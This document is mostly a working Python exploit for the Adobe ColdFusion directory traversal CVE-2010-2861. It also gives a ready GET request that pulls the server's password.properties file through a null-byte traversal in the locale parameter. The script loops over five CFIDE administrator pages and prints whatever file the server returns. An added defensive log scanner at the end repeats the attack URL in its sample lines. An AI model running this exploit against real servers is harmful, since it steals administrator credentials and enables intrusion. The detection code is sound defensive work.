Adobe ColdFusion Unspecified Directory Traversal Vulnerability

# Working GET request courtesy of carnal0wnage:
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#
# LLsecurity added another admin page filename: "/CFIDE/administrator/enter.cfm"


#!/usr/bin/python

# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
# detailed information about the exploitation of this vulnerability:
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

# leo 13.08.2010

import sys
import socket
import re

# in case some directories are blocked
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", "/cfide/install.cfm", "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/enter.cfm")

post = """POST %s HTTP/1.1
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d

locale=%%00%s%%00a"""

def main():
    if len(sys.argv) != 4:
        print "usage: %s <host> <port> <file_path>" % sys.argv[0]
        print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]
        print "if successful, the file will be printed"
        return
    
    host = sys.argv[1]
    port = sys.argv[2]
    path = sys.argv[3]

    for f in filenames:
        print "------------------------------"
        print "trying", f

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        s.send(post % (f, host, len(path) + 14, path))

        buf = ""
        while 1:
            buf_s = s.recv(1024)
            if len(buf_s) == 0:
                break
            buf += buf_s
       
        m = re.search('<title>(.*)</title>', buf, re.S)
        if m != None:
            title = m.groups(0)[0]
            print "title from server in %s:" % f
            print "------------------------------"
            print m.groups(0)[0]
            print "------------------------------"

if __name__ == '__main__':
    main()
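
Added example, not part of the original script or its author's code: a log-side check for the request shape shown above, flagging a `locale` parameter on the listed CFIDE pages that decodes to a path traversal sequence or a null byte. The function names, the combined-format sample lines and the case-insensitive path match are assumptions; the POST variant is only visible where a proxy or WAF records request bodies, so the body is an optional argument.

```python
import re
from urllib.parse import unquote, urlsplit

# Endpoints from the script above, lower-cased for case-insensitive matching.
CFIDE_ENDPOINTS = {"/cfide/" + p for p in (
    "wizards/common/_logintowizard.cfm", "administrator/archives/index.cfm",
    "install.cfm", "administrator/entman/index.cfm", "administrator/enter.cfm")}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r"\.\.[\\/]")

def decode_fully(value, rounds=3):
    """Percent-decode several times so double-encoded values are still caught."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def locale_findings(url, body=""):
    """Return why a request's `locale` parameter matches the CVE-2010-2861 pattern."""
    parts = urlsplit(url)
    if unquote(parts.path).lower() not in CFIDE_ENDPOINTS:
        return []
    reasons = set()
    for source in (parts.query, body):  # query string and, if captured, POST body
        for pair in source.split("&"):
            name, _, raw = pair.partition("=")
            if unquote(name).lower() != "locale":
                continue
            value = decode_fully(raw)
            if "\x00" in value:
                reasons.add("null byte")
            if TRAVERSAL.search(value):
                reasons.add("path traversal")
    return sorted(reasons)

def scan_access_log(lines):
    """Return (line_number, reasons) for every flagged access-log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        reasons = locale_findings(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

SAMPLE_LOG = [  # constructed lines (documentation IP range), not real traffic
    '192.0.2.10 - - [13/Aug/2010:10:00:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 512',
    '192.0.2.11 - - [13/Aug/2010:10:00:05 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 2048',
    '192.0.2.12 - - [13/Aug/2010:10:00:09 +0000] "POST /cfide/install.cfm HTTP/1.1" 200 1024',
]
```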